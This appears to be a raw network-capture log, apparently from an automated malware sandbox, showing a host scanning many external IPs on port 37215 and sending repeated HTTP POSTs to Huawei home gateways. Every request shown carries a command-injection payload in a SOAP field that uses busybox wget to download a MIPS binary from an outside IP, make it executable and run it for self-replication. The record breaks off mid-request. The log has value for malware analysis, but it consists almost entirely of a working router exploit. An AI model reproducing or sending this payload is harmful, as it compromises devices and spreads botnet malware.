                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2056192.168.2.1535802147.74.92.14437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.070669889 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2057192.168.2.1557004157.22.22.5337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.070686102 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2058192.168.2.1551372179.32.249.20437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.070954084 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2059192.168.2.1546132157.223.17.24837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.071048975 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2060192.168.2.154524825.7.49.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.071064949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2061192.168.2.1552492193.131.233.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.071089983 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2062192.168.2.1542284157.109.249.11637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.071281910 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2063192.168.2.1556764197.166.222.23737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.071347952 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2064192.168.2.1559034157.51.54.9037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.075742960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2065192.168.2.1557624197.186.254.7637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:21.076771021 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
